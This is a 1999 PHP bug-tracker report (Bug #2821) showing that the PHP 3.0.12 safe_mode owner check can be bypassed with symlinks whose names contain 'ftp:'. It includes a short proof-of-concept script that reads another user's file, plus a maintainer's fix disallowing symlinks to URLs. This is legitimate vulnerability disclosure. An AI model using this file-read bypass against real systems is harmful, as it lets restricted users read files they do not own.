PHP :: Bug #2821 :: safe_mode check bypassed by link/symlink

Bug #2821	safe_mode check bypassed by link/symlink
Submitted:	1999-11-24 17:39 UTC	Modified:	1999-11-28 17:24 UTC
From:	stas at zend dot com	Assigned:
Status:	Closed	Package:	Misbehaving function
PHP Version:	3.0.12	OS:	All
Private report:	No	CVE-ID:	None

View Add Comment Developer Edit

[1999-11-24 17:39 UTC] stas at zend dot com

Let's imagine restricted user, that has chrooted FTP and safe-mode PHP. Can this user read other user's files? Yes, he can:

<?php 
symlink(".","ww/ftp:");
chdir("ww");
symlink("ftp://../../secretfile.html","l");
$f=fopen("l","r");
fpassthru($f);
?>

gives contents of secret_file, even though it isn't user-owned. the "ftp://" part breaks owner check for symlink, and "l" is allowed since "ww" is owned by current user. 
Note, that removing directory-check and checking only by UID will break all config-saving scripts...

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[1999-11-24 17:43 UTC] stas at zend dot com

Sorry, forgot to mention - ww is user-owned world-writable dir (easily created with any FTP client, I think).

[1999-11-28 09:30 UTC] stas at zend dot com

the bugs script seems to eat everything that is like a href. First line of php script should be
symlink(".","ww/ftpCOLON")

where COLON is a colon.

[1999-11-28 17:24 UTC] rasmus at cvs dot php dot net

Symlinks to urls are now no longer allowed

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu May 02 10:01:30 2024 UTC